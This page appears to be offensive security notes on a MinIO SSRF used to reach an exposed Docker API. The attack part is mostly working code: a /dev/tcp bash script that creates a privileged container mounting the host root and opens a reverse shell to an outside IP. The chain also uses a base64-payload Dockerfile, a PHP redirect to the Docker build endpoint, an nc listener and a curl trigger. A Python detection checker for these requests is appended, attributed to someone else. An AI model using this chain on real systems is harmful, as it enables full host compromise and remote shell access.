minio

MinIO is a high-performance distributed object storage system.
https://github.com/minio/minio

1. MinIO SSRF: blind attack against the Docker API

#!/usr/bin/env bash  
  
# 1  
exec 3<>/dev/tcp/172.17.0.1/2375  
lines=(  
    'POST /containers/create HTTP/1.1'  
    'Host: 172.17.0.1:2375'  
    'Connection: close'  
    'Content-Type: application/json'  
    'Content-Length: 133'  
    ''  
    '{"HostName":"remoteCreate","User":"root","Image":"172.22.18.64/public/mysql:5.6","HostConfig":{"Binds":["/:/mnt"],"Privileged":true}}'  
)  
printf '%s\r\n' "${lines[@]}" >&3  
while read -r data <&3; do  
    echo $data  
    if [[ $data == '{"Id":"'* ]]; then  
        echo $data | cut -c 8-12 > /tmp/id  
    fi  
done  
exec 3>&-  
  
# 2  
exec 3<>/dev/tcp/172.17.0.1/2375  
lines=(  
    "POST /containers/`cat /tmp/id`/start HTTP/1.1"  
    'Host: 172.17.0.1:2375'  
    'Connection: close'  
    'Content-Type: application/x-www-form-urlencoded'  
    'Content-Length: 0'  
    ''  
)  
printf '%s\r\n' "${lines[@]}" >&3  
while read -r data <&3; do  
    echo $data  
done  
exec 3>&-  
  
# 3  
exec 3<>/dev/tcp/172.17.0.1/2375  
lines=(  
    "POST /containers/`cat /tmp/id`/exec HTTP/1.1"  
    'Host: 172.17.0.1:2375'  
    'Connection: close'  
    'Content-Type: application/json'  
    'Content-Length: 75'  
    ''  
    '{"Cmd": ["/bin/bash", "-c", "bash -i >& /dev/tcp/172.22.18.23/19999 0>&1"]}'  
)  
printf '%s\r\n' "${lines[@]}" >&3  
while read -r data <&3; do  
    echo $data  
    if [[ $data == '{"Id":"'* ]]; then  
        echo $data | cut -c 8-71 > /tmp/id  
    fi  
done  
exec 3>&-  
  
# 4  
exec 3<>/dev/tcp/172.17.0.1/2375  
lines=(  
    "POST /exec/`cat /tmp/id`/start HTTP/1.1"  
    'Host: 172.17.0.1:2375'  
    'Connection: close'  
    'Content-Type: application/json'  
    'Content-Length: 27'  
    ''  
    '{"Detach":true,"Tty":false}'  
)  
printf '%s\r\n' "${lines[@]}" >&3  
while read -r data <&3; do  
    echo $data  
done  
exec 3>&-

Base64-encode the script and put it in a Dockerfile.
Then host the Dockerfile on a server that MinIO can reach.

FROM 172.22.18.64/public/mysql:5.6

RUN echo IyEvdXNyL(Base64 of the script above) |base64 -d >/tmp/1.sh
RUN chmod +x /tmp/1.sh && /tmp/1.sh

Then create an index.php on the server (if an index.html exists, it must be deleted).

<?php
header('Location: http://127.0.0.1:2375/build?remote=http://172.22.18.23/Dockerfile&nocache=true&t=evil:2', false, 307);

remote is the address of our server.

Start a listener

nc -lvnp 19999

Send the request

curl -X POST http://172.22.18.29:9000/minio/webrpc \
     -H "Host: 172.22.18.23" \
     -H "Content-Type: application/json" \
     -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" \
     -d '{"id":1,"jsonrpc":"2.0","params":{"token":"Test"},"method":"web.LoginSTS"}'
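From the defender's side, each request in this chain has a recognizable shape. The following is an added example, not part of the original notes: a checker that flags those shapes in HTTP request records. The record layout (service, method, target, host, body), the finding names and the MinIO host allowlist are assumptions made for illustration.

```python
import json
from urllib.parse import urlsplit, parse_qs

# Assumption: Host values that legitimate clients use to reach this MinIO.
ALLOWED_MINIO_HOSTS = {"172.22.18.29:9000"}

def check_request(service, method, target, host="", body=""):
    """Return findings for one request record (service: "minio" or "docker")."""
    findings = []
    url = urlsplit(target)
    if service == "minio":
        # The webrpc request above carries a Host header naming another server.
        if url.path == "/minio/webrpc" and host not in ALLOWED_MINIO_HOSTS:
            findings.append("minio-webrpc-unexpected-host")
        return findings
    # Docker Engine API paths may carry a version prefix such as /v1.41.
    parts = [p for p in url.path.split("/") if p]
    if parts and parts[0].startswith("v") and parts[0][1:2].isdigit():
        parts = parts[1:]
    if method == "POST" and parts == ["build"] and "remote" in parse_qs(url.query):
        findings.append("docker-build-from-remote-url")
    if method == "POST" and parts == ["containers", "create"]:
        try:
            cfg = json.loads(body or "{}")
        except ValueError:
            return findings + ["docker-create-unparseable-body"]
        hc = cfg.get("HostConfig") if isinstance(cfg, dict) else None
        hc = hc if isinstance(hc, dict) else {}
        if hc.get("Privileged") is True:
            findings.append("docker-create-privileged")
        # A bind whose source is "/" exposes the host filesystem to the container.
        if any(str(b).split(":", 1)[0] == "/" for b in hc.get("Binds") or []):
            findings.append("docker-create-host-root-bind")
    return findings

# Constructed records mirroring the requests shown on this page, plus one benign call.
SAMPLES = [
    ("minio", "POST", "/minio/webrpc", "172.22.18.23", ""),
    ("docker", "POST", "/build?remote=http://172.22.18.23/Dockerfile&nocache=true&t=evil:2", "127.0.0.1:2375", ""),
    ("docker", "POST", "/containers/create", "172.17.0.1:2375",
     '{"User":"root","HostConfig":{"Binds":["/:/mnt"],"Privileged":true}}'),
    ("docker", "GET", "/v1.41/containers/json", "172.17.0.1:2375", ""),
]

if __name__ == "__main__":
    for rec in SAMPLES:
        print(rec[1], rec[2].split("?")[0], "->", check_request(*rec) or "ok")
```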